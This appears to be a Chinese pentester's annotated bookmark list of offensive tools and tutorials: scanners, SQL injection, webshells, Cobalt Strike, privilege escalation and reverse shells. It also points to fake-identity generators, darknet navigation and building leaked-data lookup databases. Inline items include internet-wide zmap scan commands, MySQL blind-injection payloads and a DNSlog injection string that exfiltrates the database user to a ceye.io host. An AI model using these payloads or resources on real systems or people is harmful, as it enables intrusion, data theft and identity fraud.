[TOC!]
https://github.com/fuzzdb-project/fuzzdb
https://github.com/danielmiessler/SecLists
字典https://github.com/tennc/webshell
最全的Webshell脚本https://github.com/Ridter/Pentest
大牛的各种脚本http://file.mayter.cn/
mayter的分享站点https://www.somd5.com/download/dict/
字典http://securityxploded.com/download.php
国外站点各种小公具https://navisec.it/
网址导航https://navisec.it/%E7%BC%96%E8%BE%91%E5%99%A8%E6%BC%8F%E6%B4%9E%E6%89%8B%E5%86%8C/
编辑器漏洞手册http://shentoushi.top/
网络安全从业者安全导航https://wooyun.shuimugan.com/
乌云8.9w漏洞查询https://www.guerrillamail.com/zh/inbox?mail_id=88646495
临时邮箱(半个小时)https://mail.yandex.com/?uid=539638978&login=beyond1-beyond#inbox
免费邮箱http://www.gmx.com
极好的免费邮箱http://www.fakenamegenerator.com
身份信息生成http://thehiddenwiki.org/
暗网导航http://www.nirsoft.net
各种小公具丶可以说应有尽有http://blog.csdn.net/hackerie/article/details/77885818
开源漏洞扫描器合集http://www.haoweichi.com/
死外国佬 信息生成(中文)https://asciinema.org/
很好的视频录制工具https://my.freenom.com/
免费域名,要用Google、Facebook登录http://ftp.psu.ru/linux/kali-images
各种kali版本下载http://mail.yandex.com
匿名邮箱https://protonmail.com/
匿名邮箱https://zhuanlan.zhihu.com/p/25085337https://viettelidc.com.vn
越南VPS提供商http://ipdeal.cn/?post=3
渗透常用的扫描嗅探工具罗集
https://www.cnblogs.com/backlion
web渗透(16)、内网渗透(28)
https://www.lshack.cn
主要是收藏了klion和Micropoor的文章还有其他的少数APT攻击的文章
Python工具库(感谢backlion整理)
https://www.t00ls.net/pytools.html
专为渗透测试人员设计的Python工具大合集
http://www.freebuf.com/sectool/138779.html
weblogic 管理密码在线解密的工具,python版
https://threathunter.org/topic/5954b6480084b15859bc7268
Weblogic爆破
https://github.com/dc3l1ne/Weblogic-Weakpassword-Scnner
- DSVW
非常轻量级,就一个py文件
https://github.com/stamparm/DSVW.git
-
shodan.io
https://cli.shodan.io/
利用Shodan和Censys进行信息侦查http://www.freebuf.com/articles/web/90887.html
-
censys.io 利用Censys批量获取Juniper Netscreen后门
http://www.freebuf.com/vuls/90886.html
-
Censys:一款洞察互联网秘密的新型搜索引擎
http://www.freebuf.com/news/89285.html
-
Fofa.so
垃圾东西,老子爬行都封我账号
采集fofa结果脚本v2
http://www.ansbase5.org/?p=190
- zoomeye.org
这个也是垃圾,最多只给5000的结果
- 扫描器横向对比图
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
-
我的不归路之重新认识Docker(完整版)
http://www.secist.com/archives/4016.html
-
使用Docker构建渗透测试容器(安全相关Docker Image收集)
https://xianzhi.aliyun.com/forum/read/613.html
-
使用Docker环境快速搭建靶机环境
http://www.freebuf.com/articles/system/143711.html
-
Docker入门简明教程
http://www.sqlsec.com/2017/01/docker.html
-
使用ELK搭建社工库
https://www.t00ls.net/articles-32593.html
-
搭建秒级查询社工库实践
https://www.secquan.org/Notes/731
-
手把手教你DIY一个CloudEye
http://www.freebuf.com/sectool/87846.html
-
Lalin:一款为Kali集成各种安全工具的懒人工具包
http://www.freebuf.com/news/142759.html
比一比Nmap、Zmap、Masscan三种扫描工具
http://www.freebuf.com/sectool/119340.html
基于nmap扫描结果的端口爆破工具:BrutesPray
http://bobao.360.cn/learning/detail/4024.html
安装zmap可以直接apt-get install zmap
,当然这个不是最新版本的zmap,这样安装的zmap是不支持分片式扫描的,要安装最新的可以直接去官方的GitHub下载安装。
手动安装最新版zmap (这个安装姿势我不是很明白,只是测试可行,总感觉有问题)
apt-get install build-essential cmake libgmp3-dev gengetopt libpcap-dev flex byacc libjson-c-dev pkg-config libunistring-dev -y
apt-get install git -y
git clone https://github.com/zmap/zmap.git
cd zmap
cmake -DCMAKE_INSTALL_PREFIX=$HOME/opt .
make -j4
make install
cd
cp /root/opt/sbin/zmap /usr/sbin/
rm /root/opt/ -rf
zmap -h
zmap 你的参数 --shards=N --shard=n -seed=一个固定的数
如果要扫全网的80,提供一共5台机器,每台机器给50M来扫描,那么:
zmap -B 50M -p 80 -n 100% -o results0.txt --shards=5 --shard=0 --seed=65534
zmap -B 50M -p 80 -n 100% -o results1.txt --shards=5 --shard=1 --seed=65534
zmap -B 50M -p 80 -n 100% -o results2.txt --shards=5 --shard=2 --seed=65534
zmap -B 50M -p 80 -n 100% -o results3.txt --shards=5 --shard=3 --seed=65534
zmap -B 50M -p 80 -n 100% -o results4.txt --shards=5 --shard=4 --seed=65534
--shards=N 意思就是机器总数
--shard=n 意思是当前机器序号 <序号从0开始>
--seed=65534 就是随机数种子,这里设置为65534
互联网扫描器 ZMap 完全手册
https://linux.cn/article-5860-1.html
安装姿势 (debian系列)
sudo apt-get install git gcc make libpcap-dev -y
git clone https://github.com/robertdavidgraham/masscan
cd masscan
apt-get install clang
make
cd bin
cp masscan /usr/bin/
masscan
cd ../../
rm -rf masscan/
Masscan:最快的互联网IP端口扫描器
http://www.freebuf.com/sectool/112583.html
Masscan教程和入门手册
http://www.4hou.com/tools/8251.html
- 在docker容器快速部署Nessus(Linux版)
https://www.t00ls.net/articles-36468.html
-
AWVS awvs 11一键启动-停止脚本
https://xianzhi.aliyun.com/forum/read/1616.html
利用burpsuite去掉AWVS标识
https://www.t00ls.net/articles-38059.html
-
APPScan
-
BurpSuite BurpSuite中的安全测试插件推荐
https://www.waitalone.cn/burpsuite-plugins.html
burp-vulners-scanner
https://www.t00ls.net/thread-42335-1-1.html
网络文章 HUNT:一款可提升漏洞扫描能力的BurpSuite漏洞扫描插件
http://www.freebuf.com/sectool/143182.html
利用burpsuite去掉AWVS标识
https://www.t00ls.net/articles-38059.html
实战教程:用Burpsuite测试移动应用程序
http://www.4hou.com/penetration/8965.html
burp suite手册知识
- [Burp Suite 实战指南](Burp Suite 实战指南)
https://t0data.gitbooks.io/burpsuite/
- Burp Suite 官方中文文档 https://yw9381.gitbooks.io/burp_suite_doc_zh_cn/content/
intruder攻击类型
-
Sniper标签 这个是我们最常用的,Sniper是狙击手的意思。这个模式会使用单一的payload【就是导入字典的payload】组。它会针对每个position中$$位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行测试。攻击中的请求总数应该是position数量和payload数量的乘积。
-
Battering ram – 这一模式是使用单一的payload组。它会重复payload并且一次把所有相同的payload放入指定的位置中。这种攻击适合那种需要在请求中把相同的输入放到多个位置的情况。请求的总数是payload组中payload的总数。简单说就是一个playload字典同时应用到多个position中
-
Pitchfork – 这一模式是使用多个payload组。对于定义的位置可以使用不同的payload组。攻击会同步迭代所有的payload组,把payload放入每个定义的位置中。比如:position中A处有a字典,B处有b字典,则a【1】将会对应b【1】进行attack处理,这种攻击类型非常适合那种不同位置中需要插入不同但相关的输入的情况。请求的数量应该是最小的payload组中的payload数量
-
Cluster bomb – 这种模式会使用多个payload组。每个定义的位置中有不同的payload组。攻击会迭代每个payload组,每种payload组合都会被测试一遍。比如:position中A处有a字典,B处有b字典,则两个字典将会循环搭配组合进行attack处理这种攻击适用于那种位置中需要不同且不相关或者未知的输入的攻击。攻击请求的总数是各payload组中payload数量的乘积。
-
whatweb whatweb初级篇
http://www.freebuf.com/column/151540.html
whatweb高级篇
http://www.freebuf.com/column/152611.html
-
御剑web指纹识别
-
Web App 特征识别库
https://gist.github.com/Tr3jer/271a9e26e267a47a8e9f1aa76c47a003
http://www.thinkings.org/2017/05/29/characteristics-data.html
-
CMS-checker
https://github.com/oways/cms-checker
-
御剑 经典 版本很多,我列举的是珍藏版
http://www.jb51.net/softs/43405.html
-
轻量级web目录扫描器 - webscan_dir
https://github.com/0daysec/webscan_dir
https://www.t00ls.net/viewthread.php?tid=42717
-
DirBuster
https://sourceforge.net/projects/dirbuster/
-
DirBrute
https://github.com/Xyntax/DirBrute
-
python自动化WEB旁注目录扫描器
-
Sensitive FileScan 爬行站点并根据爬行出来的目录扫描 (这是我一直想做的扫描器现在有人做了)
https://github.com/aipengjie/sensitivefilescan
-
用python实现dirbuster,附字典(From t00ls)
https://www.t00ls.net/thread-42869-1-1.html
https://github.com/githubmaidou/tools/tree/master/dirScan
-
XSSfork
https://github.com/bsmali4/xssfork
-
XSStrike:基于Python的XSS测试工具
http://www.freebuf.com/sectool/142044.html
-
一款用于发现SSRF、XXE、XSS漏洞的小工具
https://github.com/jobertabma/ground-control
-
IIS短文件名暴力枚举漏洞利用工具(IIS shortname Scanner)
https://github.com/lijiejie/IIS_shortname_Scanner/blob/master/iis_shortname_Scan.py
- 阿D注入工具 英文名字:DSQLTools
还有比这个更加经典的注入工具么?答案是没有!从2006年问世以来,10年间多少人都是从这个工具开始的,我相信80%的安全人员都用过阿D注入工具,这是多么令人怀念的工具啊,直到现在,我经常掏出这款神器来玩,在当时,国外那些批量找注入的工具都弱爆了,唯有我阿D能1秒百个注入!当然,时过境迁,阿D已经不能满足当前的网络环境所带来的需求了,不过经典终究是经典。
- 明小子注入工具 英文名字:Domain
明小子注入工具是还在黑客动画吧的明小子写的一款工具,他作为黑客动画吧的学员逆袭成为讲师,并给会员留下来的工具,能注入Access、MsSQL、Mysql数据库,准确率也比阿D高,只是批量的话就逊色不少,并且在界面方面个人感觉没有阿D做的靓仔。
- HDSI
教主的作品,当然不是你们知道的教主,这个教主是我们开始学习都已经隐退的人儿了。他的这个工具也可以说是一个划时代的产物,支持多种数据库的注入,并且可以扫目录、后台、文件,还有MsSQl注入点的多种利用功能。
- NBSI
曾记否?遥想当年,岁月联盟是多么的牛逼,无数脚本小子所神往的地方,这就是岁月联盟的出品的!直至现在还没有比NBSI对MsSQl注入点判断还要准确的注入工具了。
- pangolin
支持的数据库仅次于SQLMap,功能非常强大,很多时候SQLMap出不来,pangolin却可以做到。
-
SQLMap 下载 -->
git clone https://github.com/sqlmapproject/sqlmap.git
自从SQLMap问世以来,多少安全人员从Pangolin、havij、HDSI、NBSI来到了SQLMap。
-
大规模SQL注入漏洞扫描器:SQLiv
http://www.freebuf.com/column/145948.html
-
爬虫爬取,然后根据POC利用
https://github.com/erevus-cn/pocscan
-
Jenkins漏洞探测、用户抓取爆破
https://github.com/blackye/Jenkins
-
Some-PoC-oR-ExP
https://github.com/aipengjie/Some-PoC-oR-ExP
-
joomla
- joomlavs
- joomlascan
-
exp-for-python 一些python脚本
https://github.com/backlion/exp-for-python
-
WordPress漏洞相关
-
WPForce——一款 Wordpress 漏洞利用工具
http://www.4hou.com/technology/4254.html
-
WordPress漏洞利用框架v1.6.1
http://pentestit.com/update-wordpress-exploit-framework-v1-6-1/
-
在线扫描WordPress网站漏洞
https://wpscans.com/
-
WordPress扫描器plecost 找出CVE
https://github.com/iniqua/plecost
-
-
数据库类
- mongodb-redis匿名扫描脚本
https://xianzhi.aliyun.com/forum/read/659.html
- mongodb-redis匿名扫描脚本
-
弱口令检测(F-Scrack) #--# Python的 不错的 支持以下服务:FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL
https://xianzhi.aliyun.com/forum/read/306.html
https://github.com/ysrc/F-Scrack
-
醉考拉_tomcat弱口令扫描器 v1.0
https://github.com/magicming200/tomcat-weak-password-scanner
-
自制弱口令字典top100
http://gv7.me/articles/2017/making-the-password-top-100/
-
awBruter - 千倍速一句话密码爆破工具
https://github.com/theLSA/awBruter
-
Patator
https://github.com/lanjelot/patator
-
NagaScan:针对Web应用的分布式被动扫描器
http://www.freebuf.com/vuls/141679.html
-
在docker容器中运行或一键运行GourdScanV2 (windows版)
https://www.t00ls.net/articles-36467.html
Cobalt Strike
-
WMI Persistence with Cobalt Strike
https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html
-
Persistence cna
https://github.com/harleyQu1nn/AggressorScripts/tree/master/Persistence
-
Cobalt Strike神器高级教程利用Aggressor脚本编写目标上线邮件提醒
https://www.anquanke.com/post/id/98829
-
Cobalt Strike与metasploit两兄弟搞基的故事之session间的传递
https://www.t00ls.net/viewthread.php?tid=41526
mht -
如何使用RDP跳过网络隔离?
http://www.freebuf.com/articles/network/146460.html
-
CScriptShell
https://github.com/Cn33liz/CScriptShell
绕过powershell执行白名单,执行js、vbs
Empire:PowerShell后期漏洞利用代理工具
http://www.freebuf.com/articles/web/76892.html
http://www.powershellempire.com/
渗透利器之内网信息获取工具
http://wolvez.club/?p=505
Linux上通过SMB枚举操作系统信息、域信息、共享目录以及用户的内网渗透工具
https://github.com/m8r0wn/nullinux
nirsoft_package_1.20.11
http://download.nirsoft.net/nirsoft_package_1.20.11.zip
多功能Python键盘记录工具:Radium
http://www.freebuf.com/sectool/150596.html
-
知识要点
-
乙方渗透测试之信息收集
http://www.cnnetarmy.com/%E4%B9%99%E6%96%B9%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/
PDF -
微步在线
x.threatbook.cn
-
Google Hacking:你的信息刺探利器
http://paper.tuisec.win/detail/d7400e743892755
-
渗透测试工程师子域名收集指南
http://www.4hou.com/technology/8535.html
-
渗透测试向导—子域名枚举技术
https://zhuanlan.zhihu.com/p/31160156
-
我眼中的渗透测试信息搜集
https://xianzhi.aliyun.com/forum/read/451.html
-
熟练利用shodan hacking 辅助我们快速渗透 [ 通常针对大中型目标 ]
https://klionsec.github.io/2014/12/15/shodan-hacking/
-
从phpinfo中能获取哪些敏感信息
https://xianzhi.aliyun.com/forum/read/1418.html
-
-
相关工具
LNScan–一个高效的信息探测脚本
http://0ke.org/index.php/archives/40/
不老的神器:安全扫描器Nmap渗透使用指南
http://www.freebuf.com/news/141607.html
一些Nmap NSE脚本推荐
http://www.polaris-lab.com/index.php/archives/390/
-
相关案例
以针对Yahoo! 的安全测试为例讲解如何高效的进行子域名收集与筛选
http://www.freebuf.com/articles/network/140738.html
-
subDomainsBrute #--#非常优秀,但是只是子域名爆破
https://github.com/lijiejie/subDomainsBrute
-
Sublist3r 还会通过搜索引擎来搜索子域名
https://github.com/aboul3la/Sublist3r.git
-
Teemo 子域名收集中重量级工具
https://github.com/bit4woo/Teemo.git
未授权访问漏洞总结
https://paper.seebug.org/409/
已保存PDF
不请自来 | Redis 未授权访问漏洞深度利用
http://www.freebuf.com/vuls/148758.html
memcache未授权访问利用工具为:go-derper
-
web应用渗透测试流程
http://mp.weixin.qq.com/s/pbE86sBNWxKojKk8Vt-reg
-
Web-Security-Learning
https://chybeta.github.io/2017/08/19/Web-Security-Learning/
- 扯谈web安全之JSON
http://www.importnew.com/23253.html
-
JSON与CORS漏洞挖掘
https://www.anquanke.com/post/id/97671
-
CORS入门讲解
https://zcfy.cc/article/a-href-50-lines-of-code-a
-
[]跨域资源共享(CORS)](https://www.alibabacloud.com/help/zh/doc-detail/31928.htm)`https://www.alibabacloud.com/help/zh/doc-detail/31928.htm`
-
[]跨域资源共享(CORS)安全性浅析](http://www.freebuf.com/articles/web/18493.html)
http://www.freebuf.com/articles/web/18493.html
-
CORS跨域资源共享漏洞
https://www.cnblogs.com/sevck/p/9035422.html
-
高级CORS利用技术分享
http://www.freebuf.com/articles/terminal/175609.html
-
挖洞经验 | 看我如何绕过Yahoo!View的CORS限制策略
https://blog.csdn.net/qq_27446553/article/details/78952290
-
鸡肋漏洞的深思:CORS、XSS、CSRF的组合
http://www.freebuf.com/fevents/170446.html
SQL注入只与被注入的数据库有关,跟网站使用的脚本语言无关
Sqlmap Wiki翻译
Sqlmap Wiki翻译
http://www.findbugs.top/archives/99
PDF
SQL注入手册
https://websec.ca/kb/sql_injection
工具| sqlmap payload修改之路(上)
http://www.freebuf.com/column/161535.html
通过使用Burp和Sqlmap Tamper利用二次注入漏洞
https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/
如何手写一款SQL injection tool
http://www.freebuf.com/column/132790.html
用Mitmproxy辅助Sqlmap自动化利用特殊漏洞
http://www.freebuf.com/sectool/146578.html
mysql报错注入读取文件
select 1 from (select count(*),concat(floor(rand(0)*2),substring((select load_file('c:/3.php')),1,64))a from information_schema.tables group by a)b;
【技术分享】MySQL 注入攻击与防御
http://bobao.360.cn/learning/detail/3758.html
【技术分享】一种新的MySQL下Update、Insert注入方法
http://bobao.360.cn/learning/detail/3498.html
【技术分享】CVE-2016-5483:利用mysqldump备份可生成后门
http://bobao.360.cn/learning/detail/3591.html
mysql报错注入(显错注入)整理
http://www.moonsec.com/post-579.html
十种 MySQL 报错注入
http://rinige.com/index.php/archives/665/
mht
MySQL-盲注浅析
http://rcoil.me/2017/11/MySQL-%E7%9B%B2%E6%B3%A8%E6%B5%85%E6%9E%90/
很好的科普文
知识点
- left()
and left(version(),1)='5'
and left(version(),3)='5.1'
同理还有以下函数可使用
-
substring()/substr()
and substring(version(),1,1)='5'
and substring(version(),1,2)='5.'
and substring(version(),1,3)='5.1'
变种and (select ascii(substring((select database()),1,1))=119)
-
mid()
-
ord() 此函数为返回第一个字符的ASCII码,经常与上面的函数进行组合使用,有时候过滤'号,就可以这样用了。
ORD(MID(DATABASE(),1,1))>114
意为检测database()的第一位ASCII码是否大于114ORD(MID(DATABASE(),2,1))>114
检测第二位
sql注入入门 之 mysql 布尔型盲注(不适合零基础看)
https://klionsec.github.io/2016/05/14/mysql-bool-blind-injection/
知识点 延时注入是主要针对页面无变化、无法用布尔真假判断、无法报错的情况下的注入技术。 个人理解:延时盲注就是在布尔型的基础上加上延时代码,因为只用布尔盲注手法还是无法得出数据的情况下,所以我们就加上延时代码,如果语句能够正常按照我们预想的执行,那么浏览器页面就会按照SQL注入语句中写的延时代码延迟相应的时间后才会刷新浏览器页面。
-
sleep()
sleep(3) //延迟3秒
-
benchmark()
' and benchmark(20000000,sha1(1))-- //--后有个空格
-
sqlmap 延时盲注
sqlmap -u "url" --technique=T --time-sec=3 --risk=3
-
时间延迟盲注的三种加速注入方式[mysql篇]
http://www.ch1st.cn/?p=44
MYSQL注入天书之盲注讲解
http://www.cnblogs.com/lcamry/p/5763129.html
pwnhub time injection带来的新思路
http://www.ch1st.cn/?p=44
SQLServer注入技巧
http://ecma.io/356.html#comment-3
PDF
注入/写Webshell姿势,Nice。
MSSQL 注入攻击与防御
http://bobao.360.cn/learning/detail/3807.html
SQL Server手工注入笔记-布尔值盲注篇
http://www.secange.com/2017/06/sql-server%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0-%E5%B8%83%E5%B0%94%E5%80%BC%E7%9B%B2%E6%B3%A8%E7%AF%87/
WAITFOR DELAY '0:0:5'
SQL Server手工注入笔记-延时注入篇
http://www.secange.com/2017/06/sql-server%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0-%E5%BB%B6%E6%97%B6%E6%B3%A8%E5%85%A5%E7%AF%87/
MSsql盲注指南
http://bobao.360.cn/news/detail/3214.html
网站后台的盲注--希望大牛指点(注:文中案例可使用)
https://forum.90sec.org/forum.php?mod=viewthread&tid=5171
SQL Server手工注入-显错注入
http://iverson5.lofter.com/post/1cc66689_4c9eaf2#
PDF
SQL injection, Oracle and full-width characters
https://medium.com/@Wflki/sql-injection-oracle-and-full-width-characters-13bb86fc034a
-
PG_SLEEP(5)
-
GENERATE_SERIES(1,10000)
网络案例
一次postgresql的盲注
https://forum.90sec.org/forum.php?mod=viewthread&tid=5222
(select%20load_file(CONCAT('\\\\',(select%20user()),'.8dmer4.ceye.io\\uho')))
status=search&txtTuKhoa=1&combotype=null'%2b(select%20load_file(CONCAT('\\\\',(select%20user()),'.8dmer4.ceye.io\\uho')))%2b'&txtTenSach=
Dnslog在SQL注入中的实战
https://www.anquanke.com/post/id/98096
dnolog基础花样秀之盲注也能读配置文件
https://www.secquan.org/Discuss/804
PDF
手把手教你DIY一个CloudEye
http://www.freebuf.com/sectool/87846.html
利用DNS进行注入(突破盲注延时限制)注:不错哦
https://forum.90sec.org/forum.php?mod=viewthread&tid=9473
突破延迟注入和盲注速度限制,利用dns注入快速获取数据
https://phpinfo.me/2016/05/10/1210.html
DNSlog 注入初探
https://forum.90sec.org/forum.php?mod=viewthread&tid=9675
在SQL注入中使用DNS获取数据
http://static.hx99.net/static/drops/tips-5283.html
HawkEye Log/Dns 在Sql注入中的应用
http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html
DNSLog
https://github.com/BugScanTeam/DNSLog
简单的方式挖掘和利用soap的sql注入
https://blog.csdn.net/niexinming/article/details/49491643
针对SOAP的渗透测试与防护
https://www.anquanke.com/post/id/85410
Web Service 渗透测试从入门到精通
https://www.anquanke.com/post/id/85910
API 接口渗透测试
https://xz.aliyun.com/t/2412
泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)
https://wooyun.shuimugan.com/bug/view?bug_no=169453
文件上传绕过姿势总结
http://www.cnnetarmy.com/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF%E6%80%BB%E7%BB%93/
文件上传总结
http://mang0.me/archis/ea42f6a6/
文件上传之绕过
https://edu.aqniu.com/article/45
服务器解析漏洞
https://thief.one/2016/09/21/%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/
PDF
文件上传漏洞(绕过姿势)
https://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/
PDF
文件上传-绕过
http://byd.dropsec.xyz/2017/02/21/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E7%BB%95%E8%BF%87/
PDF
文件上传漏洞总结
http://jdrops.dropsec.xyz/2017/07/17/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/
PDF
常见上传绕过总汇
http://www.legendsec.org/1665.html
文件上传小总结
http://ohroot.com/2014/11/16/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%B0%8F%E6%80%BB%E7%BB%93/
文件上传绕过姿势
https://evilchurch.cc/page/file-upload/
PDF
那些年我们一起学过的XSS
https://0x9.me/YCZcX
XSS挑战之旅学习总结
https://www.secpulse.com/archives/59497.html
从瑞士军刀到变形金刚--XSS攻击面拓展
https://xianzhi.aliyun.com/forum/read/1988.html
每个人都该知道的7种主要的XSS案例
http://bobao.360.cn/learning/detail/4223.html
build_your_ssrf_exp_autowork
https://github.com/ring04h/papers/blob/master/build_your_ssrf_exp_autowork--20160711.pdf
SSRF攻击实例解析
http://www.freebuf.com/articles/web/20407.html
通过漏洞组合利用实现企业内网入侵
http://www.10tiao.com/html/148/201703/2651665089/1.html
SSRF漏洞(原理&绕过姿势)
https://www.t00ls.net/articles-41070.html
SSRF漏洞的挖掘经验
http://bobao.360.cn/learning/detail/240.html
Bool型SSRF的思考与实践
http://wps2015.org/drops/drops/Bool%E5%9E%8BSSRF%E7%9A%84%E6%80%9D%E8%80%83%E4%B8%8E%E5%AE%9E%E8%B7%B5.html
PHP 文件包含漏洞姿势总结 -Mhtml
https://mp.weixin.qq.com/s/RaxfIg9x5Rh1qjDgFBr82Q
php文件包含漏洞
http://mang0.me/archis/844a29d4/
命令注入漏洞测试方法谈
https://www.hackerone.com/blog/how-to-command-injections
分享一个近期遇到的逻辑漏洞案例
http://www.freebuf.com/vuls/151196.html
SQLMAP 的SHELL 、UDF 解码
https://www.t00ls.net/viewthread.php?tid=34978
Mysql数据库渗透及漏洞利用总结
http://paper.tuisec.win/detail/83a7e1c4201e19e
已保存为PDF
MySQL利用UDF执行命令遇到的坑
http://ecma.io/615.html
oracle写shell
https://www.doyler.net/security-not-included/oracle-command-execution-sys-shell
如何通过SQL Server执行系统命令?
http://www.4hou.com/technology/3338.html
已保存为PDF
两年来收集的一些 MSSQL提权 常用命令及提权技巧。
https://www.t00ls.net/viewthread.php?tid=23198
已保存为PDF和TXT
技术分享:MSSQL注入xp_cmdshell
http://www.freebuf.com/articles/web/55577.html
已保存了udf在手册目录
PostgreSQL UDF手工提权
https://www.t00ls.net/viewthread.php?tid=22829
PostgreSQL UDF提权
https://www.t00ls.net/viewthread.php?tid=22540
postgresql udf打包
https://www.t00ls.net/viewthread.php?tid=33452
全部postgresql udf文件打包
https://www.t00ls.net/viewthread.php?tid=31575
postgresql数据库udf执行命令资料的都不成功,请大神帮忙看看
https://www.t00ls.net/viewthread.php?tid=35925
linux各种一句话反弹shell总结
http://bobao.360.cn/learning/detail/4551.html
GO语言反弹shell
https://github.com/audibleblink/gorsh
开启RDP
http://b404.xyz/2017/12/27/open-RDP/
浅析重定向与反弹Shell命令
http://www.freebuf.com/articles/system/153986.html
你能找到我么?-- 隐藏用户建立(Powershell)
https://evi1cg.me/archives/UserClone.html
js 实现浏览器用户信息收集
http://rinige.com/index.php/archives/720/
mht
win7的多用户登录方法和补丁收集
https://www.t00ls.net/viewthread.php?tid=24556
渗透技巧——从Admin权限切换到System权限
http://www.4hou.com/technology/8814.html
Windows命令行下载远程payload及执行任意代码的几种方法
http://www.4hou.com/system/8661.html
windows环境下批处理实现守护进程
http://blog.csdn.net/qin9r3y/article/details/22805095
读取iis配置(包括密码) 已保存有EXE
【技术分享】使用burp macros和sqlmap绕过csrf防护进行sql注入
http://bobao.360.cn/learning/detail/3557.html
【技术分享】如何使用Burp Suite Macros绕过防护进行自动化fuzz测试
http://bobao.360.cn/learning/detail/4363.html
渗透测试中的certutil
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84certutil.exe/
利用反代获取管理员信息与脱裤
https://www.t00ls.net/articles-37501.html
如何将简单的Shell转换成为完全交互式的TTY
http://www.freebuf.com/news/142195.html
绕过CDN查找网站真实IP方法收集
https://www.t00ls.net/articles-36160.html
最简单的方法--修改User-Agent OR 模拟浏览器你还在用安装插件
https://www.t00ls.net/articles-37079.html
Win下渗透小技巧整理
https://www.t00ls.net/articles-37224.html
Windows上传并执行恶意代码的N种姿势
http://reverse-tcp.xyz/2017/12/28/windows-to-download-and-execute-arbitrary-code/
PDF
cmd上传文件的N种方法
https://www.t00ls.net/articles-37253.html
windows命令执行上传文件的姿势
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247484210&idx=1&sn=29bdb48a5f18ed9952f3fd97fd4bf638&scene=21#wechat_redirect
Use xwizard.exe to load dll
http://www.secange.com/2017/08/use-xwizard-exe-to-load-dll/
【Blackhat】详解Web缓存欺骗攻击
http://bobao.360.cn/learning/detail/4175.html
文档型漏洞攻击研究报告
https://www.secpulse.com/archives/59165.html
安全直接对象引用漏洞入门指南
http://www.hackingarticles.in/beginner-guide-insecure-direct-object-references/
Powershell攻击指南——黑客后渗透之道系列之基础篇
https://www.anquanke.com/post/id/87976
Powershell(一) https://04z.net/2017/06/27/Powershell-One/
Powershell(二) https://04z.net/2017/06/29/Powershell-Two/
Powershell(三) https://04z.net/2017/07/02/Powershell-Three/
Powershell 渗透测试工具-Nishang(一)
http://bobao.360.cn/learning/detail/3182.html
Powershell 渗透测试工具-Nishang(二)
http://bobao.360.cn/learning/detail/3200.html
一篇文章精通PowerShell Empire 2.3(上)
https://www.anquanke.com/post/id/87328
一篇文章精通PowerShell Empire 2.3(下)
https://www.anquanke.com/post/id/87333
powershell加载exe到内存
http://jkme.github.io/powershell-elf.html
“无文件”攻击方式渗透实验
http://www.freebuf.com/articles/system/129228.html
无弹窗APT渗透实验
http://www.freebuf.com/articles/network/146650.html
powershell 渗透框架 [empire]
https://klionsec.github.io/2016/10/06/empire-powershell/
PowerShell 安全专题之攻击检测篇
https://zhuanlan.zhihu.com/p/25226349
绕过PowerShell 执行策略的15种方法
http://www.jianshu.com/p/3c2f048b2870
PSAttack:一个包含所有的渗透测试的powershell脚本框架
http://pentestit.com/psattack-offensive-powershell-console/
使用Powershell反弹Meterpreter Shell
http://www.mottoin.com/87266.html
如何不调用PowerShell.exe获得Empire agent
http://bobao.360.cn/learning/detail/4187.html
windows提权EXp总结
https://github.com/SecWiki/windows-kernel-exploits
[]提权从入门到自闭](http://www.northity.com/2018/10/19/%E6%8F%90%E6%9D%83%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E8%87%AA%E9%97%AD/)
http://www.northity.com/2018/10/19/%E6%8F%90%E6%9D%83%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E8%87%AA%E9%97%AD/
windows 溢出提权小记
https://klionsec.github.io/2017/04/22/win-0day-privilege/
windows本地提权对照表
http://www.7kb.org/138.html
WinServer2012提权:实验RottenPotato(烂土豆)+Metasploit
https://www.t00ls.net/articles-41160.html
Potato(邪恶土豆)–windows全版本猥琐提权
https://www.bbsmax.com/A/A2dmVZQ7ze/
邪恶土豆配合MSF提权
http://qq1.ltd/?p=44
metasploit渗透测试之信息收集(一)
http://mp.weixin.qq.com/s/jULhbW8MbNSC2NGCt82y5A
命令行下的信息搜集
http://www.secange.com/2017/08/%e5%91%bd%e4%bb%a4%e8%a1%8c%e4%b8%8b%e7%9a%84%e4%bf%a1%e6%81%af%e6%90%9c%e9%9b%86-2/
攻击者侵入系统后如何提升账户权限:提权技术详细分析
http://www.freebuf.com/news/141335.html
使用Frida从TeamViewer内存中提取密码
https://github.com/vah13/extractTVpasswords
Windows内核攻击提权(包含18种系统级别exp)
http://mp.weixin.qq.com/s/gFnEaHzXodg2ILPUVf6GYg
Linux udf提权 以下3文已经保存PDF
http://www.bkjia.com/Mysql/823966.html
